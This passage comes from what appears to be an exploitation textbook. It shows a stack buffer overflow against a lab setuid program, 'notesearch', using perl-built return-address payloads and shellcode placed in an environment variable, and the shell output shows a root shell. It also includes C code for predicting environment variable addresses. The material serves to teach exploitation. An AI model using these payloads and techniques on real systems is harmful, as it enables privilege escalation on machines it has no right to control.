reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2# whoami
root
sh-3.2#
The target address is repeated enough times to overwrite the return address, and execution returns into the NOP sled in the environment variable, which inevitably slides into the shellcode. In situations where the overflowed buffer isn't large enough to hold shellcode, an environment variable can be used with a large NOP sled instead. This usually makes exploitation quite a bit easier.
A huge NOP sled is a great aid when you have to guess at the target return address, but it turns out that the locations of environment variables are easier to predict than the locations of local stack variables. The C standard library has a function called getenv(), which takes the name of an environment variable as its only argument and returns a pointer to that variable's value in memory. The code in getenv_example.c demonstrates the use of getenv().
getenv_example.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s VARIABLE\n", argv[0]);
        return 1;
    }
    /* getenv() returns a pointer into the process environment, or NULL if the variable is unset */
    printf("%s is at %p\n", argv[1], (void *)getenv(argv[1]));
    return 0;
}
When compiled and run, this program displays the location of a given environment variable in its own memory. This provides a much more accurate prediction of where the same environment variable will be when the target program is run.
reader@hacking:~/booksrc $ gcc getenv_example.c
reader@hacking:~/booksrc $ ./a.out SHELLCODE
SHELLCODE is at 0xbffff90b
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#
This is accurate enough with a large NOP sled, but when the same thing is attempted without a sled, the program crashes. This means the environment prediction is still slightly off.
reader@hacking:~/booksrc $ export SLEDLESS=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
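The getenv() lookups above show a single address each, and the last run shows that the prediction from a.out does not carry over to notesearch exactly. The following added example (not from the book, and not part of its booksrc) walks the process environment to show what makes such an address predictable in the first place: the kernel packs the environment strings back to back, so a variable's distance from the first string is simply the combined length of the entries before it. env_offset(), predicted_value_offset() and the sample_env array are constructed for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;   /* the process environment as laid out at startup */

/* Byte offset of the "NAME=value" entry from the first environment string,
 * assuming the strings are packed back to back as the kernel lays them out.
 * Each entry occupies strlen(entry) + 1 bytes (the +1 is its NUL terminator).
 * Returns (size_t)-1 when NAME is not present in envp. */
size_t env_offset(char **envp, const char *name) {
    size_t offset = 0;
    size_t namelen = strlen(name);
    for (char **e = envp; *e != NULL; e++) {
        /* match "NAME=" exactly, so "SHELL" does not match "SHELLCODE=..." */
        if (strncmp(*e, name, namelen) == 0 && (*e)[namelen] == '=')
            return offset;
        offset += strlen(*e) + 1;
    }
    return (size_t)-1;
}

/* Offset of the value itself, which is what getenv() points at: skip "NAME=". */
size_t predicted_value_offset(char **envp, const char *name) {
    size_t off = env_offset(envp, name);
    return off == (size_t)-1 ? off : off + strlen(name) + 1;
}

/* Constructed sample environment, used to check the arithmetic offline. */
char *sample_env[] = { "A=1", "SHELLCODE=xyz", "B=2", NULL };

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s VARIABLE\n", argv[0]);
        return 1;
    }
    char *actual = getenv(argv[1]);
    size_t off = predicted_value_offset(environ, argv[1]);
    if (actual == NULL || off == (size_t)-1 || environ[0] == NULL) {
        printf("%s is not set\n", argv[1]);
        return 1;
    }
    /* Predict the value's address from the first string plus the packed offset,
     * then compare with what getenv() actually returns. */
    char *predicted = environ[0] + off;
    printf("first environment string at %p\n", (void *)environ[0]);
    printf("%s value: %zu bytes further, predicted %p, getenv() says %p (%s)\n",
           argv[1], off, (void *)predicted, (void *)actual,
           predicted == actual ? "match" : "environment was modified after startup");
    return 0;
}
```

The predicted and actual pointers agree only while the environment is untouched since startup; setenv() and putenv() place new strings on the heap, outside the packed block. The offset inside the block depends only on the entries before the variable, but the absolute address also depends on what the kernel stores above the block, the program's own name among it, which is why a value measured from a differently named helper program such as a.out can be a few bytes off even though the offsets inside the block are exact.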